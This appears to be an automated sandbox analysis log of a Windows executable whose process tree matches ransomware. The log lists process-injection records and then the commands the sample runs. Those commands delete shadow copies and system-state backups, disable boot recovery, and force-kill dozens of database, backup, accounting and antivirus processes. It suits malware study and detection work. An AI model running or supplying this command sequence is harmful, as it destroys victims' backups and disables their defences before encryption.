PID 3720 wrote to memory of 3412	3720	7e415d5a1b1235491cb698eb14817d31.exe	291
PID 3720 wrote to memory of 3412	3720	7e415d5a1b1235491cb698eb14817d31.exe	291
PID 3720 wrote to memory of 3412	3720	7e415d5a1b1235491cb698eb14817d31.exe	291
PID 3412 wrote to memory of 1096	3412	cmd.exe	293
PID 3412 wrote to memory of 1096	3412	cmd.exe	293
PID 3412 wrote to memory of 1096	3412	cmd.exe	293
PID 3720 wrote to memory of 3628	3720	7e415d5a1b1235491cb698eb14817d31.exe	294
PID 3720 wrote to memory of 3628	3720	7e415d5a1b1235491cb698eb14817d31.exe	294
PID 3720 wrote to memory of 3628	3720	7e415d5a1b1235491cb698eb14817d31.exe	294
PID 3628 wrote to memory of 1264	3628	cmd.exe	296
PID 3628 wrote to memory of 1264	3628	cmd.exe	296
PID 3628 wrote to memory of 1264	3628	cmd.exe	296
PID 3720 wrote to memory of 1104	3720	7e415d5a1b1235491cb698eb14817d31.exe	297
PID 3720 wrote to memory of 1104	3720	7e415d5a1b1235491cb698eb14817d31.exe	297
PID 3720 wrote to memory of 1104	3720	7e415d5a1b1235491cb698eb14817d31.exe	297
PID 1104 wrote to memory of 2420	1104	cmd.exe	299
PID 1104 wrote to memory of 2420	1104	cmd.exe	299
PID 1104 wrote to memory of 2420	1104	cmd.exe	299
PID 3720 wrote to memory of 2564	3720	7e415d5a1b1235491cb698eb14817d31.exe	300
PID 3720 wrote to memory of 2564	3720	7e415d5a1b1235491cb698eb14817d31.exe	300
PID 3720 wrote to memory of 2564	3720	7e415d5a1b1235491cb698eb14817d31.exe	300
PID 2564 wrote to memory of 3832	2564	cmd.exe	302
PID 2564 wrote to memory of 3832	2564	cmd.exe	302
PID 2564 wrote to memory of 3832	2564	cmd.exe	302
PID 3720 wrote to memory of 2920	3720	7e415d5a1b1235491cb698eb14817d31.exe	303
PID 3720 wrote to memory of 2920	3720	7e415d5a1b1235491cb698eb14817d31.exe	303
PID 3720 wrote to memory of 2920	3720	7e415d5a1b1235491cb698eb14817d31.exe	303
PID 2920 wrote to memory of 1288	2920	cmd.exe	305
PID 2920 wrote to memory of 1288	2920	cmd.exe	305
PID 2920 wrote to memory of 1288	2920	cmd.exe	305
PID 3720 wrote to memory of 2668	3720	7e415d5a1b1235491cb698eb14817d31.exe	306
PID 3720 wrote to memory of 2668	3720	7e415d5a1b1235491cb698eb14817d31.exe	306
PID 3720 wrote to memory of 2668	3720	7e415d5a1b1235491cb698eb14817d31.exe	306
PID 2668 wrote to memory of 2664	2668	cmd.exe	308
PID 2668 wrote to memory of 2664	2668	cmd.exe	308
PID 2668 wrote to memory of 2664	2668	cmd.exe	308
PID 3720 wrote to memory of 1332	3720	7e415d5a1b1235491cb698eb14817d31.exe	309
PID 3720 wrote to memory of 1332	3720	7e415d5a1b1235491cb698eb14817d31.exe	309
PID 3720 wrote to memory of 1332	3720	7e415d5a1b1235491cb698eb14817d31.exe	309
PID 1332 wrote to memory of 2324	1332	cmd.exe	311
PID 1332 wrote to memory of 2324	1332	cmd.exe	311
PID 1332 wrote to memory of 2324	1332	cmd.exe	311
PID 3720 wrote to memory of 1452	3720	7e415d5a1b1235491cb698eb14817d31.exe	312
PID 3720 wrote to memory of 1452	3720	7e415d5a1b1235491cb698eb14817d31.exe	312
PID 3720 wrote to memory of 1452	3720	7e415d5a1b1235491cb698eb14817d31.exe	312
PID 1452 wrote to memory of 2784	1452	cmd.exe	314
PID 1452 wrote to memory of 2784	1452	cmd.exe	314
PID 1452 wrote to memory of 2784	1452	cmd.exe	314
PID 3720 wrote to memory of 1516	3720	7e415d5a1b1235491cb698eb14817d31.exe	315
PID 3720 wrote to memory of 1516	3720	7e415d5a1b1235491cb698eb14817d31.exe	315
PID 3720 wrote to memory of 1516	3720	7e415d5a1b1235491cb698eb14817d31.exe	315
PID 1516 wrote to memory of 3980	1516	cmd.exe	317
PID 1516 wrote to memory of 3980	1516	cmd.exe	317
PID 1516 wrote to memory of 3980	1516	cmd.exe	317
PID 3720 wrote to memory of 2560	3720	7e415d5a1b1235491cb698eb14817d31.exe	318
PID 3720 wrote to memory of 2560	3720	7e415d5a1b1235491cb698eb14817d31.exe	318
PID 3720 wrote to memory of 2560	3720	7e415d5a1b1235491cb698eb14817d31.exe	318
PID 2560 wrote to memory of 2116	2560	cmd.exe	320
PID 2560 wrote to memory of 2116	2560	cmd.exe	320
PID 2560 wrote to memory of 2116	2560	cmd.exe	320
PID 3720 wrote to memory of 2208	3720	7e415d5a1b1235491cb698eb14817d31.exe	321
PID 3720 wrote to memory of 2208	3720	7e415d5a1b1235491cb698eb14817d31.exe	321
PID 3720 wrote to memory of 2208	3720	7e415d5a1b1235491cb698eb14817d31.exe	321
PID 2208 wrote to memory of 2152	2208	cmd.exe	323
PID 2208 wrote to memory of 2152	2208	cmd.exe	323
PID 2208 wrote to memory of 2152	2208	cmd.exe	323
PID 3720 wrote to memory of 1676	3720	7e415d5a1b1235491cb698eb14817d31.exe	324
PID 3720 wrote to memory of 1676	3720	7e415d5a1b1235491cb698eb14817d31.exe	324
PID 3720 wrote to memory of 1676	3720	7e415d5a1b1235491cb698eb14817d31.exe	324
PID 1676 wrote to memory of 1096	1676	cmd.exe	326
PID 1676 wrote to memory of 1096	1676	cmd.exe	326
PID 1676 wrote to memory of 1096	1676	cmd.exe	326
PID 3720 wrote to memory of 1508	3720	7e415d5a1b1235491cb698eb14817d31.exe	327
PID 3720 wrote to memory of 1508	3720	7e415d5a1b1235491cb698eb14817d31.exe	327
PID 3720 wrote to memory of 1508	3720	7e415d5a1b1235491cb698eb14817d31.exe	327
PID 1508 wrote to memory of 1264	1508	cmd.exe	329
PID 1508 wrote to memory of 1264	1508	cmd.exe	329
PID 1508 wrote to memory of 1264	1508	cmd.exe	329
PID 3720 wrote to memory of 1832	3720	7e415d5a1b1235491cb698eb14817d31.exe	330
PID 3720 wrote to memory of 1832	3720	7e415d5a1b1235491cb698eb14817d31.exe	330
PID 3720 wrote to memory of 1832	3720	7e415d5a1b1235491cb698eb14817d31.exe	330
PID 1832 wrote to memory of 2420	1832	cmd.exe	332
PID 1832 wrote to memory of 2420	1832	cmd.exe	332
PID 1832 wrote to memory of 2420	1832	cmd.exe	332
PID 3720 wrote to memory of 3456	3720	7e415d5a1b1235491cb698eb14817d31.exe	333
PID 3720 wrote to memory of 3456	3720	7e415d5a1b1235491cb698eb14817d31.exe	333
PID 3720 wrote to memory of 3456	3720	7e415d5a1b1235491cb698eb14817d31.exe	333
PID 3456 wrote to memory of 3832	3456	cmd.exe	335
PID 3456 wrote to memory of 3832	3456	cmd.exe	335
PID 3456 wrote to memory of 3832	3456	cmd.exe	335
PID 3720 wrote to memory of 1656	3720	7e415d5a1b1235491cb698eb14817d31.exe	336
PID 3720 wrote to memory of 1656	3720	7e415d5a1b1235491cb698eb14817d31.exe	336
PID 3720 wrote to memory of 1656	3720	7e415d5a1b1235491cb698eb14817d31.exe	336
PID 1656 wrote to memory of 1288	1656	cmd.exe	338
PID 1656 wrote to memory of 1288	1656	cmd.exe	338
PID 1656 wrote to memory of 1288	1656	cmd.exe	338
PID 3720 wrote to memory of 364	3720	7e415d5a1b1235491cb698eb14817d31.exe	339
PID 3720 wrote to memory of 364	3720	7e415d5a1b1235491cb698eb14817d31.exe	339
PID 3720 wrote to memory of 364	3720	7e415d5a1b1235491cb698eb14817d31.exe	339
PID 364 wrote to memory of 2664	364	cmd.exe	341
PID 364 wrote to memory of 2664	364	cmd.exe	341
PID 364 wrote to memory of 2664	364	cmd.exe	341
PID 3720 wrote to memory of 3108	3720	7e415d5a1b1235491cb698eb14817d31.exe	342
PID 3720 wrote to memory of 3108	3720	7e415d5a1b1235491cb698eb14817d31.exe	342
PID 3720 wrote to memory of 3108	3720	7e415d5a1b1235491cb698eb14817d31.exe	342
PID 3108 wrote to memory of 2324	3108	cmd.exe	344
PID 3108 wrote to memory of 2324	3108	cmd.exe	344
PID 3108 wrote to memory of 2324	3108	cmd.exe	344
PID 3720 wrote to memory of 2100	3720	7e415d5a1b1235491cb698eb14817d31.exe	345
PID 3720 wrote to memory of 2100	3720	7e415d5a1b1235491cb698eb14817d31.exe	345
PID 3720 wrote to memory of 2100	3720	7e415d5a1b1235491cb698eb14817d31.exe	345
PID 2100 wrote to memory of 2784	2100	cmd.exe	347
PID 2100 wrote to memory of 2784	2100	cmd.exe	347
PID 2100 wrote to memory of 2784	2100	cmd.exe	347
PID 3720 wrote to memory of 2132	3720	7e415d5a1b1235491cb698eb14817d31.exe	348
PID 3720 wrote to memory of 2132	3720	7e415d5a1b1235491cb698eb14817d31.exe	348
PID 3720 wrote to memory of 2132	3720	7e415d5a1b1235491cb698eb14817d31.exe	348

C:\Users\Admin\AppData\Local\Temp\7e415d5a1b1235491cb698eb14817d31.exe
"C:\Users\Admin\AppData\Local\Temp\7e415d5a1b1235491cb698eb14817d31.exe"
1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:3720
- C:\Windows\SysWOW64\cmd.exe
  cmd /C wmic.exe SHADOWCOPY DELETE /nointeractive
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4004
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic.exe SHADOWCOPY DELETE /nointeractive
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP
  2⤵
  PID:3224
- C:\Windows\SysWOW64\cmd.exe
  cmd /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  2⤵
  PID:3292
- C:\Windows\SysWOW64\cmd.exe
  cmd /C bcdedit.exe /set {default} recoveryenabled No
  2⤵
  PID:4072
- C:\Windows\SysWOW64\cmd.exe
  cmd /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  PID:3028
- C:\Windows\SysWOW64\cmd.exe
  cmd /C vssadmin.exe Delete Shadows /All /Quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3612
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:796
- C:\Windows\SysWOW64\cmd.exe
  cmd /C C:\Windows\system32\vssvc.exe
  2⤵
  PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wxServer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3724
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wxServer*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3736
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wxServerView*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3456
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wxServerView*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3820
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlmangr*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlmangr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1004
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM RAgui*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM RAgui*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2320
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM supervise*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:820
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM supervise*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2172
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Culture*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Culture*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:576
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Defwatch*
  2⤵
  PID:60
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Defwatch*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:416
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM winword*
  2⤵
  PID:3724
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM winword*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBW32*
  2⤵
  PID:4004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBW32*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2564
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgr*
  2⤵
  PID:1244
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBDBMgr*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3728
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM qbupdate*
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM qbupdate*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:776
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM axlbridge*
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM axlbridge*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1452
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM httpd*
  2⤵
  PID:796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM httpd*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:692
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fdlauncher*
  2⤵
  PID:916
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fdlauncher*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3576
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MsDtSrvr*
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MsDtSrvr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:416
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM java*
  2⤵
  PID:3940
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM java*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3412
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM 360se*
  2⤵
  PID:3880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM 360se*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1828
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM 360doctor*
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM 360doctor*
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1252
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wdswfsafe*
  2⤵
  PID:1552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wdswfsafe*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2920
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fdhost*
  2⤵
  PID:2324
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fdhost*
    3⤵
    - Kills process with taskkill
    PID:1956
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM GDscan*
  2⤵
  PID:2824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM GDscan*
    3⤵
    - Kills process with taskkill
    PID:3688
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ZhuDongFangYu*
  2⤵
  PID:912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ZhuDongFangYu*
    3⤵
    PID:2172
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgrN*
  2⤵
  PID:2132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBDBMgrN*
    3⤵
    - Kills process with taskkill
    PID:540
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM mysqld*
  2⤵
  PID:864
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM mysqld*
    3⤵
    - Kills process with taskkill
    PID:2220
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM AutodeskDesktopApp*
  2⤵
  PID:492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM AutodeskDesktopApp*
    3⤵
    PID:1676
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM acwebbrowser*
  2⤵
  PID:688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM acwebbrowser*
    3⤵
    - Kills process with taskkill
    PID:3796
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Creative Cloud*
  2⤵
  PID:1824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Creative Cloud*
    3⤵
    - Kills process with taskkill
    PID:3456
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Adobe Desktop Service*
  2⤵
  PID:3008
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Adobe Desktop Service*
    3⤵
    - Kills process with taskkill
    PID:3828
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM CoreSync*
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM CoreSync*
    3⤵
    - Kills process with taskkill
    PID:2980
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Adobe CEF Helper*
  2⤵
  PID:1552
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Adobe CEF Helper*
    3⤵
    - Kills process with taskkill
    PID:2656
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM node*
  2⤵
  PID:980
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM node*
    3⤵
    - Kills process with taskkill
    PID:1336
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM AdobeIPCBroker*
  2⤵
  PID:4072
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM AdobeIPCBroker*
    3⤵
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sync-taskbar*
  2⤵
  PID:2800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sync-taskbar*
    3⤵
    - Kills process with taskkill
    PID:796
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sync-worker*
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sync-worker*
    3⤵
    - Kills process with taskkill
    PID:488
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM InputPersonalization*
  2⤵
  PID:2152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM InputPersonalization*
    3⤵
    - Kills process with taskkill
    PID:3876
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM AdobeCollabSync*
  2⤵
  PID:576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM AdobeCollabSync*
    3⤵
    - Kills process with taskkill
    PID:3724
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM BrCtrlCntr*
  2⤵
  PID:492
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM BrCtrlCntr*
    3⤵
    - Kills process with taskkill
    PID:1172
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM BrCcUxSys*
  2⤵
  PID:688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM BrCcUxSys*
    3⤵
    - Kills process with taskkill
    PID:2428
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SimplyConnectionManager*
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SimplyConnectionManager*
    3⤵
    PID:1268
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
  2⤵
  PID:2328
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Simply.SystemTrayIcon*
    3⤵
    - Kills process with taskkill
    PID:2320
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fbguard*
  2⤵
  PID:1472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fbguard*
    3⤵
    - Kills process with taskkill
    PID:1280
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM fbserver*
  2⤵
  PID:2104
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM fbserver*
    3⤵
    - Kills process with taskkill
    PID:344
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ONENOTEM*
  2⤵
  PID:2784
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ONENOTEM*
    3⤵
    - Kills process with taskkill
    PID:2904
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM wrapper*
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM wrapper*
    3⤵
    - Kills process with taskkill
    PID:3948
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM DefWatch*
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM DefWatch*
    3⤵
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ccEvtMgr*
  2⤵
  PID:2192
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    PID:508
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM ccSetMgr*
  2⤵
  PID:1676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM ccSetMgr*
    3⤵
    - Kills process with taskkill
    PID:972
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SavRoam*
  2⤵
  PID:3796
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SavRoam*
    3⤵
    - Kills process with taskkill
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Sqlservr*
  2⤵
  PID:1824
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Sqlservr*
    3⤵
    - Kills process with taskkill
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlagent*
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlagent*
    3⤵
    - Kills process with taskkill
    PID:3832
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqladhlp*
  2⤵
  PID:2572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqladhlp*
    3⤵
    PID:1288
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Culserver*
  2⤵
  PID:1692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Culserver*
    3⤵
    PID:2664
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM RTVscan*
  2⤵
  PID:2804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlbrowser*
  2⤵
  PID:3696
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlbrowser*
    3⤵
    - Kills process with taskkill
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLADHLP*
  2⤵
  PID:3384
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLADHLP*
    3⤵
    - Kills process with taskkill
    PID:3980
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBIDPService*
  2⤵
  PID:3708
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBIDPService*
    3⤵
    - Kills process with taskkill
    PID:2116
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
  2⤵
  PID:2224
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:2152
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM QBCFMonitorService*
  2⤵
  PID:3004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM sqlwriter*
  2⤵
  PID:3836
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM sqlwriter*
    3⤵
    - Kills process with taskkill
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM msmdsrv*
  2⤵
  PID:1800
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM msmdsrv*
    3⤵
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM tomcat6*
  2⤵
  PID:1896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM tomcat6*
    3⤵
    - Kills process with taskkill
    PID:3832
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM zhudongfangyu*
  2⤵
  PID:2536
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:1288
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM vmware-usbarbitator64*
  2⤵
  PID:1468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM vmware-usbarbitator64*
    3⤵
    PID:2664
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM vmware-converter*
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM vmware-converter*
    3⤵
    - Kills process with taskkill
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM dbsrv12*
  2⤵
  PID:2860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM dbsrv12*
    3⤵
    - Kills process with taskkill
    PID:2784
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM dbeng8*
  2⤵
  PID:2136
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM dbeng8*
    3⤵
    - Kills process with taskkill
    PID:3980
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    PID:2116
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
  2⤵
  PID:416
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM MSSQL$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:2152
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
  2⤵
  PID:3412
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:1096
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLBrowser*
  2⤵
  PID:3628
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLBrowser*
    3⤵
    - Kills process with taskkill
    PID:1264
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM SQLWriter*
  2⤵
  PID:1104
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM SQLWriter*
    3⤵
    PID:2420
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM FishbowlMySQL*
  2⤵
  PID:2564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /T /IM FishbowlMySQL*
    3⤵
    - Kills process with taskkill
    PID:3832
- C:\Windows\SysWOW64\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:2920
